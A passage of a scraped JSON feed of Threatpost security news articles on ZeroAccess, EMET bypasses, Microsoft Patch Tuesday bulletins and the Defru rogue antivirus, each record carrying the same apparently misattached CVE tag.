attack-controlled template servers,\u201d the firm\u2019s Counter Threat Unit (CTU) wrote.\n\nOnce the URLs are visited, like a chain reaction, the bots are redirected to their final destination.\n\nThe unit claims it counted 55,000-plus different IP addresses \u2013 mostly in Japan, India and Russia \u2013 engaging with the botnet from Jan. 17 to Jan. 25. Some may consider 55K small potatoes compared to the botnet\u2019s heyday, when Microsoft cleaned half a million machines of the virus from Feb. to March 2013, but Dell is stressing that for all intents and purposes ZeroAccess should still be considered substantial.\n\nAdding that it may not be able to do what other flashy botnets can, like carry out banking fraud or hold users\u2019 files ransom, ZeroAccess can still wreak havoc on advertisers and machines it infects alike.\n\nIt was thought the [botnet was dead](<http://threatpost.com/microsoft-zeroaccess-botnet-has-been-abandoned/103273>) in December 2013 after Microsoft, along with Europol\u2019s European Cybercrime Centre (EC3), the F.B.I., and the firm A10 [disrupted ZeroAccess\u2019s](<http://threatpost.com/microsoft-and-friends-take-down-zeroaccess-botnet/103122>) two million odd machines. Click-fraud is just one of the botnet\u2019s favorite pastimes. ZeroAccess, a/k/a Sirefef, has also been seen hijacking search results and redirecting victims to malicious, information stealing websites and for a short stint the platform was even spotted [facilitating Bitcoin mining](<http://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/77168>).\n\n[Microsoft greatly curbed](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/100717>) the botnet\u2019s click-fraud tendencies in May 2013 after it added its signature to its Malicious Software Removal Tool (MSRT) and cleaned all the infected machines it could find of ZeroAccess.\n", "cvss3": {}, "published": "2015-01-29T14:25:48", "type": "threatpost", "title": "ZeroAccess Returns, Resumes Click-Fraud Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:27", "id": "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "href": "https://threatpost.com/zeroaccess-botnet-returns-resumes-click-fraud-activity/110736/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:20", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055817/microsoft_tool_1.jpg)](<https://threatpost.com/microsoft-ships-anti-exploit-tool-it-admins-072810/>)LAS VEGAS \u2014 Microsoft today released a new tool to help IT administrators backport anti-exploit mitigations like ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention) to older versions of Windows.\n\nThe tool, called Enhanced Mitigation Experience Toolkit (EMET) works by applying security mitigation technologies to arbitrary applications to block against exploitation through common attack vectors.\n\nIn addition to implementing ASLR and DEP on older versions of the Windows operating system, Microsoft said EMET will also add anti-exploit mitigations to existing third-party software that do not currently opt-in to the mitigations.\n\n\u201cThis helps to protect against successful exploitation of vulnerabilities without available fixes,\u201d says Mike Reavey, a director in Microsoft\u2019s Security Response Center (MSRC). \n\nALSR and DEP, which serve as defense-in-depth roadblocks during malware attacks, are enabled by default in newer versions of Windows.\n", "cvss3": {}, "published": "2010-07-28T18:54:55", "type": "threatpost", "title": "Microsoft Ships Anti-Exploit Tool for IT Admins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:19:37", "id": "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "href": "https://threatpost.com/microsoft-ships-anti-exploit-tool-it-admins-072810/74268/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:32", "description": "Microsoft\u2019s research unit is investing resources in a new Web browser that could eventually signal a shift away from the ubiquitous Internet Explorer.\n\nAccording to a research paper released this week, the project is called Gazelle and is positioned as a secure web browser constructed as a multi-principal operating system.\n\nFrom [the research paper](<http://research.microsoft.com/pubs/79655/gazelle.pdf>) (.pdf):\n\nGazelle\u2019s Browser Kernel is an operating system that exclusively manages resource protection and sharing across web site principals. This construction exposes intricate design issues that no previous work has identified, such as legacy protection of cross-origin script source, and cross-principal, cross-process display and events protection. We elaborate on these issues and provide comprehensive solutions.\n\nOur prototype implementation and evaluation experience indicates that it is realistic to turn an existing browser into a multi-principal OS that yields significantly stronger security and robustness with acceptable performance and backward compatibility.\n\nMore [at Slashdot](<http://tech.slashdot.org/article.pl?sid=09/02/22/1724244>).\n", "cvss3": {}, "published": "2009-03-03T20:45:46", "type": "threatpost", "title": "Microsoft researching new (secure) browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:39", "id": "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "href": "https://threatpost.com/microsoft-researching-new-secure-browser-030309/72358/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:49", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054737/xp_users_flash.jpg)](<https://threatpost.com/microsoft-warning-xp-users-update-flash-player-now-011210/>)Microsoft has shipped a security advisory with an urgent message for Windows XP users: Update your Flash Player immediately.\n\nThe Adobe Flash Player 6 that ships by default in Windows XP is vulnerable to multiple code execution vulnerabilities that could lead to PC takeover attacks, according to the advisory.\n\n \nHere\u2019s [the warning](<http://www.microsoft.com/technet/security/advisory/979267.mspx>):\n\n> Microsoft is aware of reports of vulnerabilities in Adobe Flash Player 6 provided in Windows XP. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time but recommend that users install the latest version of Flash Player provided by Adobe.\n> \n> The Adobe Flash Player 6 was provided with Windows XP and contains multiple vulnerabilities that could allow remote code execution if a user views a specially crafted Web page. Adobe has addressed these vulnerabilities in newer versions of Adobe Flash Player. Microsoft recommends that users of Windows XP with Adobe Flash Player 6 installed update to the most current version of Flash Player available from Adobe.\n\nThis issue affects Windows XP Service Pack 2 and Windows XP Service Pack 3. The warning is also applicable to users running Windows XP Professional x64 Edition Service Pack 2.\n\nAdobe discontinued support for Adobe Flash Player 6 in 2006. The [latest version of Adobe Flash Player](<http://get.adobe.com/flashplayer/>) is 10.0.42.34.\n\nAdobe Flash Player is among the most commonly exploited desktop applications so it\u2019s important for all Windows XP users to heed this warning from Microsoft.\n", "cvss3": {}, "published": "2010-01-12T21:34:16", "type": "threatpost", "title": "Microsoft warning to XP users: Update Flash Player Now", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:44:27", "id": "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "href": "https://threatpost.com/microsoft-warning-xp-users-update-flash-player-now-011210/73362/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "Scott Charney, the head of Microsoft\u2019s Trustworthy Computing efforts, said that he was the one who decided it was time to [move the TwC group in a new direction](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and integrate the security functions more deeply into the company as a whole.\n\n\u201cI was the architect of these changes. This is not about the company\u2019s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,\u201d Charney, the corporate vice president of Trustworthy Computing at Microsoft, wrote in a blog post.\n\nThe Trustworthy Computing team was an outgrowth of the effort that Microsoft started in 2002 to build more secure software. Modest at first, the TwC group eventually grew into a large team of engineers, developers and executives and became one of the more influential groups in the company. Charney, a former Department of Justice lawyer who joined Microsoft just as the security push was getting off the ground in 2002, said that the move to disperse the TwC team into different groups and change the reporting structure would help the company react more quickly and be more efficient with security related decisions.\n\n\u201cBy consolidating work within the company, as well as altering some reporting structures, Microsoft will be able to make a number of trust-related decisions more quickly and execute plans with greater speed, whether the objective is to get innovations into the hands of our customers, improve our engineering systems, ensure compliance with legal or corporate policies, or engage with regulators around the world,\u201d Charney wrote in the [post](<http://blogs.microsoft.com/cybertrust/2014/09/22/looking-forward-trustworthy-computing/>).\n\nOne of the key functions of the TwC team over the years has been the development and implementation of the Security Development Lifecycle, the comprehensive development, engineering and deployment program that\u2019s meant to build security into the company\u2019s products from the beginning. Charney said that the SDL will remain the responsibility of the part of the TwC group that\u2019s moving to the Cloud and Enterprise Division.\n\n\u201cI will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA). But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations,\u201d Charney said.\n\nThe change to the TwC group became public last week as the company was in the process of laying off 2,100 employees as part of a series of internal changes.\n", "cvss3": {}, "published": "2014-09-23T08:53:50", "type": "threatpost", "title": "Charney on Trustworthy Computing: 'I Was the Architect of These Changes'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-25T18:08:18", "id": "THREATPOST:04738138B50414CEACDB62EFA6D61789", "href": "https://threatpost.com/charney-on-trustworthy-computing-i-was-the-architect-of-these-changes/108455/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:17", "description": "Rogue antivirus was once the scourge of the Internet, and [while this sort of malware is not entirely extinct](<http://threatpost.com/pro-syrian-malware-increasing-in-number-complexity/107814>), it\u2019s fallen out of favor among criminals as users have become more aware and security products have gotten better at blocking the threat.\n\n[![Image via TechNet](https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015231/Rogue-AV-decline-300x152.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015231/Rogue-AV-decline.png>)\n\n_Image via TechNet_\n\nHowever, Daniel Chipiristeanu, an antivirus researcher at the Microsoft Malware Protection Center (MMPC), claims that a simpler, and primarily browser-based, version of the fake antivirus scheme has proven more effective in recent months.\n\nThe MMPC says that once a user machine is compromised by once such piece of malware, Rogue:Win32/Defru, it blocks users from browsing to a long list of popular websites on the Internet and instead presents an image familiar to anyone who\u2019s dealt with rogue antivirus in the past.\n\n\u201cWhen the user is browsing the Internet, the rogue will use the hosts file to redirect links to a rather infamous specific fake website (pcdefender.<removed> IP 82.146.<removed>.21) that is often used in social engineering by fake antivirus malware,\u201d Chipiristeanu explained on Microsoft\u2019s TechNet blog.\n\n[![Image via TechNet](https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015227/win32delfru-269x300.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015227/win32delfru.png>)\n\n_Image via TechNet_\n\nWhile the user will see the above image in their browser window, the URL in the address bar will be that of the website the user intended to visit in the first place. In other words, the malware quietly redirects the user to a new website, but the address bar does not reflect that movement. If the user tries to access another website, the threat follows. The message reads:\n\n\u201c_Detected on your computer malicious software that blocks access to certain Internet resources, in order to protect your authentication data from intruders the defender system Windows Security was forced to intervene.\u201d_\n\nThe fake scanner shows users a long list of non-existent malware it claims to have found on the computer in question. Then it offers to clean the system for a fee. If the user clicks the \u201cPay Now\u201d button, he will be redirected to a payment portal called \u201cpayeer.\u201d\n\n[![Image via TechNet](https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015224/defru-payment-300x143.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015224/defru-payment.png>)\n\n_Image via TechNet_\n\nChipiristeanu claims that paying the fee will not fix the problem.\n\nAt the moment, most of Defru\u2019s victim-machines \u2013 as is indicated by language \u2013 appear to be located in Russia. The United States is a distant second to Russia with Kazakhstan following closely behind in third. The remaining infections are mostly in eastern European and Middle Eastern states with some infections in western Europe as well.\n\nYou can find the list of redirected sites with the [detailed Defru malware information](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Rogue:Win32/Defru#tab=2>).\n\n\u201cThe rogue is written in PHP, uses a PHP EXE compiler (Bambalam) and will copy itself to %appdata%\\w1ndows_<4chars>.exe (e.g. \u2018w1ndows_33a0.exe\u2019),\u201d Chipiristeanu explains. \u201cIt persists at system reboot by adding itself to the registry key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the value \u2018w1ndows_<4chars>\u2019.\u201d\n\n\u201cThe user can clean their system by removing the entry value from the \u201crun\u201d registry key, delete the file from disk and delete the added entries from the hosts file.\u201d\n", "cvss3": {}, "published": "2014-08-20T13:59:20", "type": "threatpost", "title": "Fake AV Defru Puts New Spin on Rogue AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-25T18:42:59", "id": "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "href": "https://threatpost.com/a-new-spin-on-rogue-antivirus/107846/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:20", "description": "Microsoft today released its monthly [Patch Tuesday Security Bulletins](<https://technet.microsoft.com/library/security/ms14-aug>), and the top priority is another cumulative update for Internet Explorer; this one patches 26 vulnerabilities, including one that\u2019s been publicly reported, Microsoft said, and is likely being exploited. All of them are rated critical by Microsoft and allow for remote code execution should a user land on a malicious webpage using IE.\n\n\u201cIf you feel like you are constantly patching IE \u2013 you are,\u201d said Russ Ernst of Lumension. \u201cA cumulative update for the browser is now the rule more so than the exception.\u201d\n\nErnst\u2019s sentiments are no doubt being echoed in enterprise IT shops worldwide. Admins have to contend with a number of upcoming changes related to IE as well. Microsoft last week put the word out that users had [18 months to migrate to the latest version of Internet Explorer](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) for their respective versions of Windows before support would end. That would mean no more security updates for IE 6-8, older versions of the browser that lack built-in memory protections, making it so attractive for hackers and exploits.\n\nThe company followed that up last week with news that it would begin [blocking older ActiveX controls in IE](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>), starting with outdated versions of Java. That begins today, Microsoft said.\n\nThe point is that Microsoft is tired of IE being a punching bag, and it\u2019s going to force users\u2019 hands to upgrade to more secure versions of the browser and lessen the impact of targeted attacks and potential problems with [zero-days](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) such as the one reported by HP\u2019s Zero Day Initiative in May.\n\n\u201cOutdated browsers represent a major challenge in keeping the Web ecosystem safer and more secure, as modern Web browsers have better security protection. Internet Explorer 11 includes features like Enhanced Protected Mode to help keep customers safer,\u201d said Roger Capriotti, director Internet Explorer, in a [blog post](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) last week.\n\nToday\u2019s IE update, [MS14-051](<https://technet.microsoft.com/library/security/MS14-051>), include a slew of memory corruption bugs, most of them use-after-free vulnerabilities that are quickly catching up to buffer overflows as a favorite exploit for attackers.\n\n\u201cRecent advances in the state of the art for DOM fuzzing have made it easier to find [use-after-free] bugs in web browsers as researchers have found it harder and harder to find and exploit more traditional buffer overflows,\u201d said Craig Young, security researcher at Tripwire.\n\nYoung said hackers can combine a use-after-free vulnerability with a number of other techniques to bypass memory protections built in to the browser.\n\n\u201cJavaScript engines running in all browsers make it much easier for attackers to control memory allocators and therefore gain reliable code execution,\u201d Young said. \u201cCombining this vulnerability with JavaScript based \u2018heap-spraying\u2019 attacks and DEP-bypass techniques provides attackers with an easy way to execute arbitrary code.\u201d\n\nMicrosoft also advises that users pay attention to out-of-band updates released today by Adobe that patch vulnerabilities in Flash Player, as well as [a zero-day being exploited in targeted attacks against Adobe Reader and Acrobat](<http://threatpost.com/adobe-patches-reader-zero-day-used-in-targeted-attacks/107721>).\n\nThe remaining critical bulletin released today by Microsoft addresses a remote code execution vulnerability in Windows Media Center. [MS14-043](<https://technet.microsoft.com/library/security/ms14-043>) would require a user open a malicious Microsoft Office file that invokes a resource in the Media Center. This bulletin affects only Windows 7, 8 and 8.1 versions of Windows Media Center, as well as users of Windows Media Center TV Pack for Vista.\n\nThe final remote code execution vulnerability patched today, [MS14-048](<https://technet.microsoft.com/library/security/MS14-048>), is in Microsoft OneNote 2007 digital note-taking software. It\u2019s rated important because it requires user interaction to trigger an exploit.\n\nThe remaining bulletins are all rated important by Microsoft and include four privilege elevation vulnerabilities, and a pair of security feature bypass bugs.\n\n * [MS14-044](<https://technet.microsoft.com/library/security/MS14-044>) patches two vulnerabilities in Microsoft SQL Server Master Data Services and SQL Server relational database management system. Users would have to be lured to a website that injects client-side script into IE that would exploit the bug.\n * [MS14-045](<https://technet.microsoft.com/library/security/MS14-045>) fixes three vulnerabilities in Windows kernel-mode drivers where an attacker who is logged in to a computer and runs malicious code could elevate privileges.\n * [MS14-049](<https://technet.microsoft.com/library/security/MS14-049>) patches a vulnerability in Windows Installer Service that could be exploited if an attacker has valid credentials and runs a malicious application that tries to repair a previously installed app.\n * [MS14-050](<https://technet.microsoft.com/library/security/MS14-050>) is the final privilege escalation bug, and it\u2019s found in SharePoint Server. An authenticated attacker would need a malicious app running JavaScript in the user\u2019s context on a vulnerable SharePopint site to exploit the issue.\n * [MS14-046](<https://technet.microsoft.com/library/security/MS14-046>) and [MS14-047](<https://technet.microsoft.com/library/security/MS14-047>) are security feature bypass vulnerabilities in .NET Framework and LRPC. Both bugs require certain circumstances be in place, but could lead to a bypass of Address Space Layout Randomization (ASLR) and remote code execution.\n", "cvss3": {}, "published": "2014-08-12T15:09:09", "type": "threatpost", "title": "August 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-12T19:09:09", "id": "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "href": "https://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Dennis Fisher and Mike Mimoso discuss the latest security news, including the possible fork of TrueCrypt, Microsoft\u2019s new information sharing platform, the FBI\u2019s cybercrime task force and the US team\u2019s crushing tie with Portugal.\n\nDownload: [digital_underground_156.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_156.mp3>)\n\nMusic by Chris Gonsalves\n\n[![itunessub](https://media.threatpost.com/wp-content/uploads/sites/103/2014/11/07011443/itunessub.jpg)](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-06-23T15:17:13", "type": "threatpost", "title": "Threatpost News Wrap, June 23, 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:47", "id": "THREATPOST:415E19FC1402E6223871B55143D39C98", "href": "https://threatpost.com/threatpost-news-wrap-june-23-2014/106812/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:16", "description": "Exploits bypassing Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, are quickly becoming a parlor game for security researchers. With increasing frequency, white hats are poking holes in EMET, and to its credit, Microsoft has been quick to not only address those issues but challenge and reward researchers who successfully submit bypasses to its [bounty program](<http://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328>).\n\nThe tide may be turning, however, if the latest Internet Explorer zero day is any indication. An exploit used as part of the [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) against U.S. military targets contained a feature that checked whether an EMET library was running on the compromised host, and if so, the attack would not execute.\n\nThat\u2019s not the same as an in-the-wild exploit for EMET, but that may not be too far down the road, especially when you take into consideration two important factors: Microsoft continues to market EMET as an effective and temporary zero-day mitigation until a patch is released; and the impending end-of-life of Windows XP on April 8 could spark a surge in EMET installations as a stopgap.\n\nIn the meantime, the [EMET bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) keep on coming. The latest targeted a couple of mitigations in the [EMET 5.0 Technical Preview](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) released last week during RSA Conference 2014. Researchers at Exodus Intelligence refused to share much in the way of details on the exploit, preferring to offer it to its customers before making it available for public consumption. A tweet from cofounder and vice president of operations Peter Vreugdenhil said: \u201cEMET 5 bypassed with 20 ROP gadgets. ntdll only, esp points to heap containing fake stack, no other regs required. Adding to our feed soon.\u201d\n\nVreugdenhil is a fan of EMET, and is in the camp that believes hackers will be adding EMET bypasses to exploits within a year or two, despite the EMET module in Operation SnowMan, which he believes was added in order to keep the campaign from being detected as long as possible.\n\n\u201cI think most of the reason is that the return on investment for the bad guys is really not that high at this point,\u201d Vreugdenhil said. \u201cThat also means that by the time everybody actually uses [EMET] and the more ground it gains, the more likely it becomes that return on investment for the bad guys will be high enough for them to add it to their exploits.\u201d\n\nEMET provides users with a dozen [mitigations against memory-based exploits](<http://technet.microsoft.com/en-us/security/jj653751>), including ASLR, DEP, Export Address Table Filtering, Heapspray Allocation, and five return-oriented programming mitigations. ROP chains are the most effective bypass technique is use today, one that Vreugdenhil has used on a couple of occasions against EMET.\n\nWriting exploits targeting EMET, he said, is a little more involved than targeting a vulnerability in third-party software such as Flash or Java. Vreugdenhil said he generally starts with a publicly available exploit such as the latest IE 10 zero day and observes the crash the bug causes in order to understand how it corrupts memory and hopefully discloses memory that can be used to build an ROP chain. Microsoft\u2019s addition of Data Execution Prevention and ASLR in Windows Vista and Windows 7 prevents attackers from executing code in a particular memory location because those memory modules are now randomized.\n\n\u201cBack in Windows XP when there was no ASLR and no randomization of the modules, it was relatively easy. You would just pick a module and then reuse the code inside that module to still get code execution,\u201d Vreugdenhil said. \u201cWindows 7 came out and put the bar higher by shuffling the modules around, so theoretically, you didn\u2019t know where your modules were in the process. It theoretically should be impossible to point at an address and say \u2018Hey would you execute code at that address because I know there\u2019s something going to be there.\u2019\u201d\n\nIf an attacker can force a process to leak memory from inside back to an exploit, the attacker will be able to reuse that information and bypass ASLR and DEP because he will know where the memory module is located, Vreugdenhil said. From there, an attacker needs to figure out additional memory protections in place, and address those to control the underlying system.\n\n\u201cIn the case of EMET, there\u2019s a long list of protection mechanisms it adds, there\u2019s only two or three that could be a hindrance if you\u2019re writing a client-side IE exploit. And so it\u2019s usually just a matter of figuring out what they are and coming up with ways to sidestep them,\u201d Vreugdenhil said. \u201cIf we can do it, we assume there\u2019s many more people who can do it, and it\u2019s also going to be used by the bad guys anywhere between now and a year or two years.\u201d\n", "cvss3": {}, "published": "2014-03-05T10:07:31", "type": "threatpost", "title": "Researchers Investing in EMET Bypasses More than Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-05T20:45:44", "id": "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "href": "https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:23", "description": "The expected continued respite from deploying Internet Explorer patches was apparently a mirage as Microsoft changed course from last Thursday\u2019s advance notification and added two more bulletins to the [February 2014 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-feb>), including the first IE rollup of 2014.\n\nIE had patched monthly for close to a year until the January security bulletins were released, and eyebrows were raised again last Thursday when there was no mention of an IE update.\n\nToday, however, Microsoft reversed course with [MS14-010](<https://technet.microsoft.com/en-us/security/bulletin/ms14-010>), which patches 24 vulnerabilities in the browser, including one that has been publicly disclosed. No active exploits have been reported, Microsoft said.\n\nAll of the vulnerabilities enable remote code execution, and affect versions of IE going back to IE 6 on Windows XP up to IE 11 on Windows 8.1. More than 20 CVEs involving memory corruption vulnerabilities in IE were addressed along with a cross-domain information disclosure vulnerability, an elevation of privilege vulnerability and a memory corruption issue related to VBScript that is addressed in [MS14-011](<https://technet.microsoft.com/en-us/security/bulletin/ms14-011>).\n\nA IE user would have to be lured to a website hosting an exploit for the vulnerability in the VBScript scripting engine in Windows. The engine improperly handles objects in memory, Microsoft said, and an exploit could corrupt memory and allow an attacker to run code on a compromised machine.\n\n\u201cTo go from five to seven bulletins says to me that initial testing was completed last minute so they decided to slip the patch in or testing found an issue and engineer shipped a fix last minute,\u201d said Tyler Reguly, manager of security research at Tripwire. \u201cEither way, pay extra attention to MS14-010 and MS14-011 in your test environments this month before you push them out enterprise wide.\u201d\n\nColleague Craig Young cautions that a number of the IE vulnerabilities can be combined to gain admin access on compromised machines.\n\n\u201cWithout any doubt, attacks in the wild will continue and expand to the other vulnerabilities being fixed today,\u201d Young said.\n\nAs promised, Microsoft did patch a remote code execution vulnerability, [MS14-008](<https://technet.microsoft.com/en-us/security/bulletin/ms14-008>), in its Forefront Protection for Exchange 2010 security product. Microsoft said it removed the offending code from the software.\n\n\u201cI\u2019m sure a lot of people will call attention to the Forefront Protection for Exchange patch this month. However when Microsoft, the people with the source code, tells us they can\u2019t trigger the vulnerability in a meaningful way, I intend to believe them,\u201d said Tripwire\u2019s Reguly. \u201cI suspect we\u2019ll wake up tomorrow and beyond pressing apply, we\u2019ll forget this was even released.\u201d\n\nMicrosoft stopped updating Forefront for Exchange as of September 2012, but will support it with security updates for another 22 months\n\n\u201cThis should make administrators think about upgrading their Exchange servers to the latest version (which includes basic anti-malware protection by default) or consider a third party email security application,\u201d said Russ Ernst of Lumension. \u201cAdministrators that currently use Forefront Protection for Exchange have until December 2015 to get this done.\u201d\n\nThe final critical bulletin, [MS14-007](<https://technet.microsoft.com/en-us/security/bulletin/ms14-007>), is another remote code execution bug in Direct2D, which can only be triggered viewing malicious content in IE. Direct2D is a graphics API used for rendering 2-D geometry, bitmaps and text, Microsoft said. This vulnerability affects Windows 7 through Windows 8.1.\n\nMicrosoft also released three bulletins rated important that patch privilege elevation, information disclosure and denial of service vulnerabilities.\n\n * [MS14-009](<https://technet.microsoft.com/en-us/security/bulletin/ms14-009>) patches two publicly disclosed bugs in the .NET framework that could allow an attacker to elevate their privileges on a compromised machine.\n * [MS14-005](<https://technet.microsoft.com/en-us/security/bulletin/ms14-005>) handles a vulnerability in Microsoft XML Core Services that could lead to information disclosure if the victim visits a malicious site with IE.\n * [MS14-006](<https://technet.microsoft.com/en-us/security/bulletin/ms14-006>) addresses a denial-of-service vulnerability in Windows 8, RT, and Server 2012, that has been publicly disclosed. An attacker would have to send a large number of malicious IPv6 packets to a vulnerable system to exploit the bug, and the attacker must be on the same subnet as the victim.\n\nMicrosoft also sent out an update that officially [deprecates the use of the MD5 hash algorithm](<http://threatpost.com/light-microsoft-patch-load-precedes-md5-deprecation/104104>). Digital certificates with MD5 hashes issued under roots in the Microsoft root certificate program are from now on restricted.\n\n\u201cCertificates with MD5 hashes should no longer be considered safe,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing. \u201cWe\u2019ve given our customers six months to prepare their environments, and now this update is available through automatic updates.\u201d\n", "cvss3": {}, "published": "2014-02-11T14:19:34", "type": "threatpost", "title": "February 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-11T19:19:34", "id": "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "href": "https://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:33", "description": "Microsoft announced Thursday that it plans to release four bulletins next week as part of the year\u2019s first batch of [Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2014/01/09/advance-notification-service-for-the-january-2014-security-bulletin-release.aspx>), none of which are rated critical.\n\nDespite the relatively light load, the patches do address a [zero-day vulnerability in Windows XP and Windows Server 2003](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) made public in early November. Hackers were actively exploiting the [flaw in the ND Proxy driver that manages Microsoft\u2019s Telephony API](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) on XP via infected PDF attachments. Exploits work only in conjunction with an Adobe Reader vulnerability that has since been patched.\n\nIn addition to Microsoft patches, expect a fresh batch of Adobe patches as well as Oracle\u2019s quarterly Critical Patch Update, which is generally a massive patch rollout that now includes Java patches.\n\nThe Microsoft bulletins will address vulnerabilities in Windows, Office and Dynamics AX, all which Microsoft has deemed important, including the zero-day fixes.\n\n\u201cIt\u2019s only rated important for a variety of reasons, including the fact that Microsoft will end support for XP in April,\u201d said Russ Ernst, a director of product management at Lumension. \u201cIf you\u2019re still using XP, this will be an important patch to deploy. And, hopefully you are working on your migration plan.\u201d\n\nAccording to a post on Microsoft\u2019s Security Response Center blog by Dustin Childs, MS14-002, will address the zero day, and he acknowledged they were working on a patch for the issue \u2013 which stems from a vulnerability in the kernel and allows local privilege escalation and access to the kernel \u2013 back in December.\n\n\u201cWe have only seen this issue used in conjunction with a PDF exploit in targeted attacks, and not on its own,\u201d Childs said.\n\nMicrosoft has used the zero-day vulnerability as a prime opportunity to urge [Windows users to migrate off 